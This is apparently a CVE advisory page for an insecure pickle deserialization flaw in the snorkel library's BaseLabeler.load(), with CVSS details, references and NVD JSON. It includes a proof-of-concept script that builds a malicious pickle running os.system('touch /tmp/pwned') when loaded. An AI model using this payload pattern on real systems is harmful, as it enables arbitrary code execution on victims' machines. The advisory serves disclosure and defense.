CVE-2026-31223

Description

The snorkel library thru v0.10.0 contains a critical insecure deserialization vulnerability (CWE-502) in the BaseLabeler.load() method of the BaseLabeler class. The method loads serialized labeler models using the unsafe pickle.load() function on user-supplied file paths without any validation or security controls. Python's pickle module is inherently dangerous for deserializing untrusted data, as it can execute arbitrary code during the deserialization process. A remote attacker can exploit this by providing a maliciously crafted pickle file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:* - VULNERABLE

Snorkel <= 0.10.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# Malicious class to execute arbitrary code
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., create a file or pop calc)
        return (os.system, ('touch /tmp/pwned',))

# Generate the malicious pickle file
with open('exploit.pkl', 'wb') as f:
    pickle.dump(MaliciousPayload(), f)

print('Malicious pickle file generated: exploit.pkl')
print('Victim code simulation:')
print('from snorkel.labeling import BaseLabeler')
print("BaseLabeler.load('exploit.pkl')  # This triggers the exploit")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31223
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31223
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31223/
[4] VulDB https://vuldb.com/cve/CVE-2026-31223
[5] https://github.com/snorkel-team/snorkel
[6] https://www.notion.so/CVE-2026-31223-35d1e1393188811ab1d0e4a8a2e67992

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31223", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:14.223", "lastModified": "2026-05-13T15:46:18.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The snorkel library thru v0.10.0 contains a critical insecure deserialization vulnerability (CWE-502) in the BaseLabeler.load() method of the BaseLabeler class. The method loads serialized labeler models using the unsafe pickle.load() function on user-supplied file paths without any validation or security controls. Python's pickle module is inherently dangerous for deserializing untrusted data, as it can execute arbitrary code during the deserialization process. A remote attacker can exploit this by providing a maliciously crafted pickle file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.10.0", "matchCriteriaId": "F2E7FC3A-64C0-4F69-84DD-FC9BA0883D08"}]}]}], "references": [{"url": "https://github.com/snorkel-team/snorkel", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31223-35d1e1393188811ab1d0e4a8a2e67992", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}